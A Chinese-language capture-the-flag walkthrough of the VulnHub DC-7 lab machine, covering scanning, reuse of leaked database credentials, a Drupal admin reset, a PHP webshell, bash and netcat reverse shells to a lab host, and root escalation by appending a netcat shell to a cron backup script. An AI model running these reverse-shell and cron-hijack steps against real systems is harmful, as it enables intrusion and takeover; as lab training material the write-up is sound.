首页 > 其他分享 >vulnhub DC-7

vulnhub DC-7

时间:2024-07-25 20:09:49浏览次数:10  
标签:website -- DC vulnhub sql home backups dc7user

探测局域网内存活主机

nmap -sP 192.168.19.128/24

发现存活主机192.168.19.134,扫描其开放端口

nmap -p- 192.168.19.134

结果如下

22/tcp open  ssh
80/tcp open  http

访问80端口

渗透

现用whatweb扫描看一下是什么

whatweb -v 192.168.19.134

发现使用的是Drupal开源CMS框架.然而本题的漏洞点实际不出在这.我们可以看到网站的下面存在DC7USER字样猜测是作者签名
搜索发现github有作者留下来的源码.
其中存在config.php如下.

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

直接使用username和password去登录ssh.(为什么不尝试登录web?因为web的登录账号密码一定是会放在db中的,不会放到文件中)

ssh [email protected] -p 22

我们发现存在mbox文件,查看发现包含如下内容

Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

可以知道数据库保存到/home/dc7user/backups/website.sql
然后我们还看到了有cron定时以root用户权限执行/opt/scripts/backups.sh
我们查看这个文件

#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

可以看到就是定时对数据库和网站文件进行备份和加密的过程.我们查看该文件的权限

ls -l /opt/scripts

如下

-rwxrwxr-x 1 root www-data 520 Aug 29  2019 backups.sh

我们只有读和执行的权限,并没有写的权限.这个文件属于root,因此如果我们如果能追加一个/bin/bash,那么在这个脚本定时以root权限运行的时候就能做到提权
由于使用的是Drupal开源CMS框架,因此我们可以进行数据库的修改

cd /var/www/html
drush  sql-dump --result-file=/home/dc7user/backups/website.sql

我们先将数据库dump出来,然后对其进行修改

drush user-password admin --password=123456

然后我们在web端进行登录.
发现可以在Content—>Add content->Basic page去添加文章,然而只能添加html格式的,这显然不是很好.
查阅资料发现Drupal8以后为了安全问题只允许文章为html格式,但是可以添加扩展.
点击Extend->List->Install new model
然后添加我们在网上找到的扩展的网址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image

然后点击Enable newly added modules去进行安装
勾选PHP Filter然后点击Install
image

此时再去添加文章时显示可以选择PHP Code.
写入一句话木马,然后用蚁剑链接马,url为http://192.168.19.134/node/4

提权

反弹shell到kali

nc -lvvp 2333 #kali
bash -c 'bash -i >& /dev/tcp/192.168.19.128/2333 0>&1' #蚁剑

然后我们此时用户为www-data,有权限向/opt/scripts/backups.sh中去添加提权.
我们可以直接在蚁剑中向该文件写入

nc -e /bin/bash 192.168.19.128 12345

然后再kali下另开一个终端去接收

nc -lvvp 12345

等待一万年直到cron运行了脚本,提权成功.
去root home查看flag
image

标签:website,--,DC,vulnhub,sql,home,backups,dc7user
From: https://www.cnblogs.com/merak-lbz/p/18324035

相关文章

  • VulnHub:cengbox1
    靶机下载地址,下载完成后,用VirtualBox打开靶机并修改网络为桥接即可搭建成功。信息收集主机发现和端口扫描扫描攻击机(192.168.31.218)同网段存活主机确认目标机ip,并对目标机进行全面扫描。nmap192.168.31.0/24-Pn-T4nmap目标主机ip-A-p--T4确认目标机ip为192.168.31......
  • 赋能未来教育,3DCAT实时云渲染助力深圳鹏程技师学院打造5G+XR实训室
    随着国家对教育行业的重视,实训室建设已成为推动教育现代化的关键。《教育信息化2.0行动计划》、《职业教育示范性虚拟仿真实训基地建设指南》等政策文件,明确指出了加强虚拟仿真实训教学环境建设的重要性。在这一大背景下,教育行业对于实训室的需求愈发迫切,旨在通过技术革新,为学生......
  • 『vulnhub系列』FUNBOX LUNCHBREAKER
    『vulnhub系列』FUNBOX:LUNCHBREAKER下载地址:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/信息搜集:寻找内网存活主机nmap192.168.199.*访问80端口,只发现一张图片进行目录爆破,发现/robots.txtdirsearch-u"http://192.168.199.134/"访问/robots.txt......
  • ADC滤波的10种经典算法
    A、方法:根据经验判断,确定两次采样允许的最大偏差值(设为A)每次检测到新值时判断:如果本次值与上次值之差<=A,则本次值有效如果本次值与上次值之差>A,则本次值无效,放弃本次值,用上次值代替本次值B、优点:能有效克服因偶然因素引起的脉冲干扰C、缺点无法抑制那种周期性的干扰......
  • DC-1靶机渗透
    DC-1环境搭建访问https://vulnhub.com,然后搜索DC,点入后可以看到对靶机的介绍下载镜像文件。用VM打开,把网络模式改为nat模式。然后开启虚拟机。靶机渗透信息搜集IP探测先查看靶机ip是什么,arp-scan,nmap都行arp-scan-lnmap-sn192.168.179.0/24#探测主机......
  • 整合Apache Hudi+Mysql+FlinkCDC2.1+CDH6.3.0
    一、环境准备1.环境准备:flink1.13.1+hudi0.10+hive2.1.1+cdh6.3.0+mysql5.7+flinkcdc2.1+flinkweb平台二.编译hudi(这个编译是以前的一个测试版本,编译大同小异)1.使用git命令下载hudi0.10的代码steven@wangyuxiangdeMacBook-Pro~gitclonehttps://github.com/ap......
  • SpringBoot整合Flink CDC,实时追踪mysql数据变动
    ❃博主首页:「码到三十五」,同名公众号:「码到三十五」,wx号:「liwu0213」☠博主专栏:<mysql高手><elasticsearch高手><源码解读><java核心><面试攻关>♝博主的话:搬的每块砖,皆为峰峦之基;公众号搜索「码到三十五」关注这个爱发技术干货的coder,......
  • ADC相关参数定义与测试方法
    1ADC静态参数1.1GainError    ADC实际传输曲线斜率偏离理想斜率的程度。即补偿失调误差之后,输出曲线最后的实际偏差。    修正失调电压误差后,额定满量程代码与理想输入信号码值之间的差值,即GainError = Full-scaleError-OffsetError。1.2 Off......
  • ADC参数ENOB、有效分辨率、无噪声分辨率的理解及计算
    1、ENOB是有效位数:        对应于AC输入,是一项有关转换器对于AC信号的非线性性能指标,表示一个ADC在特定输入频率和采样率下的动态性能;2、有效分辨率与无噪声分辨率测量的是ADC在DC下的噪声性能;        ☆不要将有效分辨率和ENOB混淆;3、最好从直流特性入手......
  • cloudCompare去噪方法如何使用
    1.统计去噪方法       该方法的原理较为简单,判断的距离阈值为上图标记区域,即平均距离加上标准差来作为阈值,如果该点与邻域点的最大距离大于该值,那该点则标记为孤立点。 2.姑且理解为空间去噪方法吧,实在也想不出啥好名字。 上栏为邻域搜索方法,个人强烈建议采......